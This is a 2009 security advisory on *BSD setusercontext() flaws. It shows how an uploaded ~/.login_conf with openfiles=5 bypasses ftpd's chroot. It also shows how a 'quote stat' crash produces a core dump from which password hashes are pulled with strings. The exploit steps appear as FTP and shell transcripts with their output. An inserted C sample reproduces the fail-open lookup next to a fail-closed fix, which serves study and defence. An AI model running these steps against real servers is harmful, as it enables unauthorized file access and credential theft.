Various BSD derived operating systems suffer from various vulnerabilities due to
Source: kingcope[at]gmx.net  Author: Kingcope  Published: 2009-08-24
*BSD setusercontext vulnerabilities
discovered by Kingcope, July 2009

lewls XD
Let's go..
BSD derived operating systems have a special function to set a "user context".
The function setusercontext() is available on, for example, FreeBSD 5.0 and 7.0.
An example from ftpd.c:

	setusercontext(lc, pw, (uid_t)0,
		LOGIN_SETLOGIN|LOGIN_SETGROUP|LOGIN_SETPRIORITY|
		LOGIN_SETRESOURCES|LOGIN_SETUMASK);

An interesting setting here is LOGIN_SETRESOURCES, with which a user is actually
allowed to set resource limits.

From the manpage:

     LOGIN_SETRESOURCES  Set resource limits for the current process based on
			 values specified in the system login class database.
			 Class capability tags used, with and without -cur
			 (soft limit) or -max (hard limit) suffixes and the
			 corresponding resource setting:

			 cputime       RLIMIT_CPU
			 filesize      RLIMIT_FSIZE
			 datasize      RLIMIT_DATA
			 stacksize     RLIMIT_STACK
			 coredumpsize  RLIMIT_CORE
			 memoryuse     RLIMIT_RSS
			 memorylocked  RLIMIT_MEMLOCK
			 maxproc       RLIMIT_NPROC
			 openfiles     RLIMIT_NOFILE
			 sbsize        RLIMIT_SBSIZE
			 vmemoryuse    RLIMIT_VMEM

Now one can set (that is, upload) their own ~/.login_conf and play around a bit.
For example, the chroot() call in ftpd.c can be bypassed
by setting "openfiles" to a value of 5.
The following example shows:
- User "kcope" is in /etc/ftpchroot and is therefore chrooted to
  his home directory when logging in
- Using the setusercontext() technique we can easily circumvent
  the chroot() call, resulting in access to all files after a login.
- The problem now is that we cannot "ls", "get" or "put" using the ftp
  client. The cause is the open files restriction. All commands which
  do not require opening files are available though, including mkdir,
  chmod, rm etc.

Example (the files .login_conf and .login_conf.db are uploaded before
doing this):
---snip---
%cat /etc/ftpchroot
kcope
%cat .login_conf
me:\
  :openfiles=5:

%cap_mkdb .login_conf
%ftp 192.168.2.4
Connected to 192.168.2.4.
220  FTP server (Version 6.00LS) ready.
Name (192.168.2.4:root): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /usr/home/kcope
ftp> mkdir /tmp/foobar
257 "/tmp/foobar" directory created.
ftp> ls
425 Can't open passive connection: Too many open files.
425 Can't open passive connection: Too many open files.
200 PORT command successful.
550 /bin/ls -lgA: Too many open files.
ftp>
---snip---
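Added example, not code from the advisory or from FreeBSD's ftpd: the advisory does not say which step makes the chroot fall away, so this assumes (an assumption, not something the page states) that an "is this user in /etc/ftpchroot" lookup opens a file after the resource limits are applied and treats a failed fopen() as "not listed". It reproduces that under a soft RLIMIT_NOFILE of 5 and shows the fail-closed variant a defender wants beside it; all function names are hypothetical and the list file is constructed.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <unistd.h>

/* Scan a one-name-per-line list for name. If fopen() fails (EMFILE under a
 * tiny RLIMIT_NOFILE) return on_error: 0 = fail open, -1 = fail closed. */
static int lookup(const char *path, const char *name, int on_error) {
    FILE *fp = fopen(path, "r");
    char line[256];
    int found = 0;
    if (fp == NULL) return on_error;
    while (!found && fgets(line, sizeof line, fp) != NULL) {
        line[strcspn(line, "\n")] = '\0';
        found = strcmp(line, name) == 0;
    }
    fclose(fp);
    return found;
}
int checkuser_failopen(const char *p, const char *n)   { return lookup(p, n, 0); }
int checkuser_failclosed(const char *p, const char *n) { return lookup(p, n, -1); }

/* Hardened decision: only a positive "not listed" (0) skips the chroot. */
int must_chroot(int lookup_result) { return lookup_result != 0; }

/* Constructed stand-in for /etc/ftpchroot that lists only "kcope". */
int write_constructed_ftpchroot(char *path, size_t len) {
    snprintf(path, len, "/tmp/ftpchrootXXXXXX");
    int fd = mkstemp(path);
    if (fd < 0 || write(fd, "kcope\n", 6) != 6) return -1;
    return close(fd);
}

/* Mimic openfiles=5: drop the soft RLIMIT_NOFILE to 5, use up the remaining
 * descriptors, run both checks, then close the extras and restore the limit. */
int run_under_fd_pressure(const char *path, const char *name,
                          int *open_result, int *closed_result) {
    struct rlimit saved, tiny;
    int fds[8], n = 0;
    if (getrlimit(RLIMIT_NOFILE, &saved) != 0) return -1;
    tiny.rlim_cur = 5; tiny.rlim_max = saved.rlim_max;
    if (setrlimit(RLIMIT_NOFILE, &tiny) != 0) return -1;
    while (n < 8 && (fds[n] = open("/dev/null", O_RDONLY)) >= 0) n++;
    *open_result = checkuser_failopen(path, name);     /* 0: chroot silently skipped */
    *closed_result = checkuser_failclosed(path, name); /* -1: the failure is visible */
    while (n > 0) close(fds[--n]);
    return setrlimit(RLIMIT_NOFILE, &saved);
}
```

The fail-open variant answers "not listed" for kcope as soon as the descriptor limit bites, which is exactly the outcome the transcript above shows; the fail-closed variant reports an error that the caller must turn into a refused login or a forced chroot.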

Another attack involves the option "stacksize" in ~/.login_conf,
which can be used to set the maximum stack size the process may use
after the setusercontext() call.
I am currently researching if the SIGSEGVs in arbitrary locations
(depending on the stacksize) may be used to execute arbitrary code. It looks promising.

For now there is the really small possibility that the sysctl setting "kern.sugid_coredump"
is set to '1' on the target FreeBSD system and therefore allows setuid and setgid core dumps.
In the example we use the "STAT" ftp command with openfiles=5; the ftp daemon will crash, creating
a core dump in the kcope home directory which contains, for example, the master.passwd entries
(of course only when the kern.sugid_coredump sysctl setting is set to '1').

Example:

# sysctl -a | grep sugid
kern.sugid_coredump: 0
# sysctl kern.sugid_coredump=1
kern.sugid_coredump: 0 -> 1
%cat .login_conf
me:\
  :openfiles=5:

%ftp 192.168.2.4
Connected to 192.168.2.4.
220  FTP server (Version 6.00LS) ready.
Name (192.168.2.4:root): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote stat foo
213- Status of foo:
421 Service not available, remote server has closed connection.
ftp> quit
%tail /var/log/messages
...
Jul 29 04:28:46  kernel: pid 3663 (ftpd), uid 1001: exited on signal 11 (core dumped)
%
%ls -la ~/ftpd.core
-rw-------  1 kcope  users  2150400 Jul 29 04:28 /home/kcope/ftpd.core
%strings ftpd.core | grep \$1
$1$2qRDatb.$6.x04oHbLcrSSdHu4Kohg0
$1$2qRDatb.$6.x04oHbLcrSSdHu4Kohg0
$1$2qRDatb.$6.x04oHbLcrSSdHu4Kohg0
$1$fXHQPE4.$Xu6RC2GoZG2j0inNHMS4V/
$1$fXHQPE4.$Xu6RC2GoZG2j0iNNHMS4V/
... (many entries)

(These are of course not my real encrypted passwds XD)
As mentioned before, this _might_ be used to execute arbitrary code; I am still researching that.

Cheers,

Contact: kcope2@googlemail.com isowarez.de/
Kingcope 